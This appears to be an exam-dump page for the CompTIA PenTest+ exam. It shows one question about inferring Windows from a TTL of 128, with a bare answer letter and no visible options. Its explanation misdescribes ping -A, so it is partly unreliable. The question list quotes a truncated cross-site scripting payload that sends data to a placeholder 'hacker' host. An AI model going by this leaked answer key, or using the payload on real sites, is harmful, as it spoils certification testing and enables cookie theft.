DumpsFiles
 Request Exam  Contact
  • Home
  • PRACTICE EXAMS
    Oracle
    Fortinet
    Juniper
    Microsoft
    Cisco
    Citrix
    CompTIA
    VMware
    SAP
    EMC
    PMI
    HP
    Salesforce
    Other
  • View All Exams
  • New Dumps Files
  • Upload
  • Oracle
    Oracle
  • Fortinet
    Fortinet
  • Juniper
    Juniper
  • Microsoft
    Microsoft
  • Cisco
    Cisco
  • Citrix
    Citrix
  • CompTIA
    CompTIA
  • VMware
    VMware
  • SAP
    SAP
  • EMC
    EMC
  • PMI
    PMI
  • HP
    HP
  • Salesforce
    Salesforce
  1. Home
  2. CompTIA
  3. CompTIA PenTest+ Certification
  4. CompTIA.PT0-002.v2024-02-29.q166
  5. Question 1

Join the discussion

Question 1/166

A penetration tester ran a ping -A command during an unknown environment test, and it returned a 128 TTL packet. Which of the following OSs would MOST likely return a packet of this type?

Correct Answer: A
Explanation
The ping -A command sends an ICMP echo request with a specified TTL value and displays the response.
The TTL value indicates how many hops the packet can traverse before being discarded. Different OSs have different default TTL values for their packets. Windows uses 128, Apple uses 64, Linux uses 64 or 255, and Android uses 64. Therefore, a packet with a TTL of 128 is most likely from a Windows OS.

Add Comments

Your email address will not be published. Required fields are marked *

insert code
Type the characters from the picture.
Rating:
Other Question (166q)
Q1. A penetration tester ran a ping -A command during an unknown environment test, and it retu...
Q2. The following line-numbered Python code snippet is being used in reconnaissance: (Exhibit)...
Q3. After running the enum4linux.pl command, a penetration tester received the following outpu...
Q4. In the process of active service enumeration, a penetration tester identifies an SMTP daem...
Q5. You are a penetration tester reviewing a client's website through a web browser. INSTRUCTI...
Q6. A software company has hired a penetration tester to perform a penetration test on a datab...
Q7. A penetration tester finds a PHP script used by a web application in an unprotected intern...
Q8. A large client wants a penetration tester to scan for devices within its network that are ...
Q9. A penetration tester conducts an Nmap scan against a target and receives the following res...
Q10. A company requires that all hypervisors have the latest available patches installed. Which...
Q11. Which of the following should a penetration tester consider FIRST when engaging in a penet...
Q12. A client would like to have a penetration test performed that leverages a continuously upd...
Q13. A penetration tester is testing a web application that is hosted by a public cloud provide...
Q14. Which of the following describes the reason why a penetration tester would run the command...
Q15. A penetration tester was conducting a penetration test and discovered the network traffic ...
Q16. A security analyst needs to perform a scan for SMB port 445 over a/16 network. Which of th...
Q17. A penetration tester discovers that a web server within the scope of the engagement has al...
Q18. A CentOS computer was exploited during a penetration test. During initial reconnaissance, ...
Q19. Which of the following describe the GREATEST concerns about using third-party open-source ...
Q20. A penetration tester has found indicators that a privileged user's password might be the s...
Q21. A penetration tester has been contracted to review wireless security. The tester has deplo...
Q22. A penetration tester performs the following command: curl -I -http2 https://www.comptia.or...
Q23. Which of the following documents describes specific activities, deliverables, and schedule...
Q24. A new security firm is onboarding its first client. The client only allowed testing over t...
Q25. A penetration tester runs the following command on a system: find / -user root -perm -4000...
Q26. Which of the following tools should a penetration tester use to crawl a website and build ...
Q27. During a penetration-testing engagement, a consultant performs reconnaissance of a client ...
Q28. A penetration tester wrote the following Bash script to brute force a local service passwo...
Q29. A company that developers embedded software for the automobile industry has hired a penetr...
Q30. A penetration tester has been given an assignment to attack a series of targets in the 192...
Q31. A penetration tester is conducting an assessment against a group of publicly available web...
Q32. Which of the following tools would be MOST useful in collecting vendor and other security-...
Q33. A penetration tester has been contracted to review wireless security. The tester has deplo...
Q34. A company that requires minimal disruption to its daily activities needs a penetration tes...
Q35. You are a security analyst tasked with hardening a web server. You have been given a list ...
Q36. Which of the following is the BEST resource for obtaining payloads against specific networ...
Q37. During an internal penetration test against a company, a penetration tester was able to na...
Q38. An Nmap scan of a network switch reveals the following: (Exhibit) Which of the following t...
Q39. A penetration tester conducted a discovery scan that generated the following: (Exhibit) Wh...
Q40. A company is concerned that its cloud service provider is not adequately protecting the VM...
Q41. A penetration tester examines a web-based shopping catalog and discovers the following URL...
Q42. Which of the following commands will allow a penetration tester to permit a shell script t...
Q43. A penetration tester gains access to a system and is able to migrate to a user process: Gi...
Q44. The results of an Nmap scan are as follows: (Exhibit) Which of the following would be the ...
Q45. Performing a penetration test against an environment with SCADA devices brings additional ...
Q46. A penetration tester is testing a new version of a mobile application in a sandbox environ...
Q47. A penetration tester gains access to a system and is able to migrate to a user process: (E...
Q48. A penetration tester writes the following script: (Exhibit) Which of the following is the ...
Q49. The results of an Nmap scan are as follows: Starting Nmap 7.80 ( https://nmap.org ) at 202...
Q50. Which of the following tools would BEST allow a penetration tester to capture wireless han...
Q51. Deconfliction is necessary when the penetration test:...
Q52. A penetration tester is able to capture the NTLM challenge-response traffic between a clie...
Q53. A penetration tester wants to scan a target network without being detected by the client's...
Q54. Appending string values onto another string is called:...
Q55. Which of the following BEST describe the OWASP Top 10? (Choose two.)...
Q56. In Python socket programming, SOCK_DGRAM type is:...
Q57. A penetration tester ran an Nmap scan on an Internet-facing network device with the -F opt...
Q58. A penetration tester utilized Nmap to scan host 64.13.134.52 and received the following re...
Q59. A penetration tester was able to compromise a web server and move laterally into a Linux w...
Q60. Given the following code: <SCRIPT>var+img=new+Image();img.src="http://hacker/%20+%20...
Q61. A Chief Information Security Officer wants a penetration tester to evaluate whether a rece...
Q62. A penetration tester has identified several newly released CVEs on a VoIP call manager. Th...
Q63. A penetration tester will be performing a vulnerability scan as part of the penetration te...
Q64. During a penetration test, you gain access to a system with a limited user interface. This...
Q65. A security company has been contracted to perform a scoped insider-threat assessment to tr...
Q66. A security firm has been hired to perform an external penetration test against a company. ...
Q67. A consultant is reviewing the following output after reports of intermittent connectivity ...
Q68. The following PowerShell snippet was extracted from a log of an attacker machine: (Exhibit...
Q69. A security company has been contracted to perform a scoped insider-threat assessment to tr...
Q70. User credentials were captured from a database during an assessment and cracked using rain...
Q71. Which of the following is the MOST effective person to validate results from a penetration...
Q72. A penetration tester is conducting an authorized, physical penetration test to attempt to ...
Q73. A penetration tester needs to upload the results of a port scan to a centralized security ...
Q74. A security professional wants to test an IoT device by sending an invalid packet to a prop...
Q75. A penetration tester who is doing a security assessment discovers that a critical vulnerab...
Q76. A penetration tester is exploring a client's website. The tester performs a curl command a...
Q77. A penetration-testing team is conducting a physical penetration test to gain entry to a bu...
Q78. You are a penetration tester reviewing a client's website through a web browser. INSTRUCTI...
Q79. A new client hired a penetration-testing company for a month-long contract for various sec...
Q80. In the process of active service enumeration, a penetration tester identifies an SMTP daem...
Q81. A penetration tester has obtained root access to a Linux-based file server and would like ...
Q82. A penetration tester needs to perform a test on a finance system that is PCI DSS v3.2.1 co...
Q83. A penetration tester uncovers access keys within an organization's source code management ...
Q84. During an engagement, a penetration tester found the following list of strings inside a fi...
Q85. A penetration tester initiated the transfer of a large data set to verify a proof-of-conce...
Q86. A penetration tester runs the following command on a system: find / -user root -perm -4000...
Q87. A consultant is reviewing the following output after reports of intermittent connectivity ...
Q88. A penetration tester has completed an analysis of the various software products produced b...
Q89. A penetration tester ran the following commands on a Windows server: (Exhibit) Which of th...
Q90. A penetration tester is assessing a wireless network. Although monitoring the correct chan...
Q91. A penetration tester discovers a vulnerable web server at 10.10.1.1. The tester then edits...
Q92. During an assessment, a penetration tester was able to access the organization's wireless ...
Q93. A penetration tester found several critical SQL injection vulnerabilities during an assess...
Q94. Which of the following types of information would MOST likely be included in an applicatio...
Q95. The attacking machine is on the same LAN segment as the target host during an internal pen...
Q96. A client has requested that the penetration test scan include the following UDP services: ...
Q97. A company obtained permission for a vulnerability scan from its cloud service provider and...
Q98. A penetration tester is preparing to perform activities for a client that requires minimal...
Q99. During an assessment, a penetration tester obtains a list of 30 email addresses by crawlin...
Q100. A penetration tester is reviewing the following SOW prior to engaging with a client: "Netw...
Q101. A mail service company has hired a penetration tester to conduct an enumeration of all use...
Q102. Given the following script: while True: print ("Hello World") Which of the following descr...
Q103. Which of the following should a penetration tester do NEXT after identifying that an appli...
Q104. A company has recruited a penetration tester to conduct a vulnerability scan over the netw...
Q105. A penetration tester has found indicators that a privileged user's password might be the s...
Q106. Which of the following can be used to store alphanumeric data that can be fed into scripts...
Q107. A penetration tester conducted a vulnerability scan against a client's critical servers an...
Q108. A penetration tester conducts an Nmap scan against a target and receives the following res...
Q109. You are a penetration tester reviewing a client's website through a web browser. INSTRUCTI...
Q110. The following line-numbered Python code snippet is being used in reconnaissance: (Exhibit)...
Q111. During a penetration-testing engagement, a consultant performs reconnaissance of a client ...
Q112. A penetration tester who is doing a company-requested assessment would like to send traffi...
Q113. Given the following code: <SCRIPT>var+img=new+Image();img.src="http://hacker/%20+%20...
Q114. A red-team tester has been contracted to emulate the threat posed by a malicious insider o...
Q115. During a web application test, a penetration tester was able to navigate to https://compan...
Q116. A client evaluating a penetration testing company requests examples of its work. Which of ...
Q117. A penetration tester learned that when users request password resets, help desk analysts c...
Q118. A company is concerned that its cloud VM is vulnerable to a cyberattack and proprietary da...
Q119. An Nmap network scan has found five open ports with identified services. Which of the foll...
Q120. A penetration tester has obtained root access to a Linux-based file server and would like ...
Q121. Which of the following documents is agreed upon by all parties associated with the penetra...
Q122. A CentOS computer was exploited during a penetration test. During initial reconnaissance, ...
Q123. Which of the following tools would be best suited to perform a cloud security assessment?...
Q124. A company recently moved its software development architecture from VMs to containers. The...
Q125. A penetration tester was conducting a penetration test and discovered the network traffic ...
Q126. A penetration tester will be performing a vulnerability scan as part of the penetration te...
Q127. A tester who is performing a penetration test on a website receives the following output: ...
Q128. Given the following script: (Exhibit) Which of the following BEST characterizes the functi...
Q129. A penetration tester is reviewing the following SOW prior to engaging with a client: "Netw...
Q130. A penetration tester gains access to a system and establishes persistence, and then runs t...
Q131. A penetration tester was able to gain access to a system using an exploit. The following i...
Q132. A client wants a security assessment company to perform a penetration test against its hot...
Q133. An assessor wants to use Nmap to help map out a stateful firewall rule set. Which of the f...
Q134. A penetration tester successfully performed an exploit on a host and was able to hop from ...
Q135. A penetration tester receives the following results from an Nmap scan: (Exhibit) Which of ...
Q136. A final penetration test report has been submitted to the board for review and accepted. T...
Q137. A penetration tester runs the following command on a system: find / -user root -perm -4000...
Q138. A penetration tester needs to perform a test on a finance system that is PCI DSS v3.2.1 co...
Q139. A security professional wants to test an IoT device by sending an invalid packet to a prop...
Q140. During an engagement, a penetration tester found the following list of strings inside a fi...
Q141. Using the output, identify potential attack vectors that should be further investigated. (...
Q142. Which of the following assessment methods is MOST likely to cause harm to an ICS environme...
Q143. A tester who is performing a penetration test discovers an older firewall that is known to...
Q144. A penetration tester is testing a new API for the company's existing services and is prepa...
Q145. A penetration tester is testing a new API for the company's existing services and is prepa...
Q146. A penetration tester has identified several newly released CVEs on a VoIP call manager. Th...
Q147. A private investigation firm is requesting a penetration test to determine the likelihood ...
Q148. A penetration tester has established an on-path attack position and must now specially cra...
Q149. A penetration tester wants to find hidden information in documents available on the web at...
Q150. You are a security analyst tasked with hardening a web server. You have been given a list ...
Q151. A software development team is concerned that a new product's 64-bit Windows binaries can ...
Q152. After gaining access to a previous system, a penetration tester runs an Nmap scan against ...
Q153. A tester who is performing a penetration test on a website receives the following output: ...
Q154. Which of the following is a regulatory compliance standard that focuses on user privacy by...
Q155. Which of the following expressions in Python increase a variable val by one (Choose two.)...
Q156. Penetration tester is developing exploits to attack multiple versions of a common software...
Q157. A penetration tester conducts an Nmap scan against a target and receives the following res...
Q158. Which of the following situations would MOST likely warrant revalidation of a previous sec...
Q159. Given the following code: <SCRIPT>var+img=new+Image();img.src="http://hacker/%20+%20...
Q160. Penetration tester has discovered an unknown Linux 64-bit executable binary. Which of the ...
Q161. Given the following code:<SCRIPT>var+img=new+Image();img.src="http://hacker/%20+%20d...
Q162. Which of the following types of information should be included when writing the remediatio...
Q163. A company's Chief Executive Officer has created a secondary home office and is concerned t...
Q164. A tester who is performing a penetration test on a website receives the following output: ...
Q165. A penetration tester is conducting an Nmap scan and wants to scan for ports without establ...
Q166. A penetration tester is conducting an authorized, physical penetration test to attempt to ...
[×]

Download PDF File

Enter your email address to download CompTIA.PT0-002.v2024-02-29.q166.pdf

Email:

DumpsFiles

Our website provides the Largest and the most Latest vendors Certification Exam materials around the world.

Using dumps we provide to Pass the Exam, we has the Valid Dumps with passing guranteed just which you need.

  • DMCA
  • About
  • Contact Us
  • Privacy Policy
  • Terms & Conditions
©2025 DumpsFiles

www.dumpsfiles.com materials do not contain actual questions and answers from Cisco's certification exams.